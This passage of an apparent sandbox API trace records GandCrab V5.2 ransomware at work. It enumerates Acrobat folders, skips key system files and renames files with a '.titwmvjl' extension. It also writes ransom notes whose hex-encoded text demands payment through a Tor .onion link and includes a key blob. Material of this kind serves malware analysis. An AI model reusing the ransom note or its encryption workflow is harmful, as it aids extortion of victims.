x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0069.303] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0069.305] CloseHandle (hObject=0x2cc) returned 1 [0069.305] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.305] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.305] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xe, wMilliseconds=0x26d)) [0069.305] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.305] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.306] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.306] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\d2ca4a09d2ca4deb61a.lock") returned 85 [0069.306] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\forms\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0069.308] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.309] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.309] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\") returned 61 [0069.309] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\*" [0069.309] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x503938 [0069.309] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.309] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0069.309] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.309] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.309] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0069.309] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0069.309] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0069.309] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\d2ca4a09d2ca4deb61a.lock" [0069.310] lstrlenW (lpString=".titwmvjl") returned 9 [0069.310] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\d2ca4a09d2ca4deb61a.lock") returned 85 [0069.310] VirtualAlloc (lpAddress=0x0, dwSize=0xea, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.310] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 94 [0069.310] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\d2ca4a09d2ca4deb61a.lock") returned 85 [0069.310] lstrlenW (lpString=".lock") returned 5 [0069.310] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.310] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0069.310] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.310] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.311] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0069.311] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0069.311] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0069.311] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\TITWMVJL-DECRYPT.txt" [0069.311] lstrlenW (lpString=".titwmvjl") returned 9 [0069.311] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\TITWMVJL-DECRYPT.txt") returned 81 [0069.311] VirtualAlloc (lpAddress=0x0, dwSize=0xe2, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.311] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 90 [0069.311] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\TITWMVJL-DECRYPT.txt") returned 81 [0069.311] lstrlenW (lpString=".txt") returned 4 [0069.311] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.311] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0069.311] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0069.311] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.312] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\TITWMVJL-DECRYPT.txt") returned 81 [0069.312] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\TITWMVJL-DECRYPT.txt") returned 81 [0069.312] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0069.312] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0069.312] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0069.312] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0069.312] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0069.312] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0069.312] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0069.312] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0069.312] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.312] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0069.312] FindClose (in: hFindFile=0x503938 | out: hFindFile=0x503938) returned 1 [0069.312] CloseHandle (hObject=0x2cc) returned 1 [0069.313] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0069.313] lstrcmpW (lpString1="JSCache", lpString2=".") returned 1 [0069.313] lstrcmpW (lpString1="JSCache", lpString2="..") returned 1 [0069.313] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\", lpString2="JSCache" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache" [0069.313] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\" [0069.313] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.313] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.313] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.313] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.313] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.314] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.314] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.314] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.314] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.314] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.314] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.314] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\\\TITWMVJL-DECRYPT.txt") returned 84 [0069.314] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0069.320] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f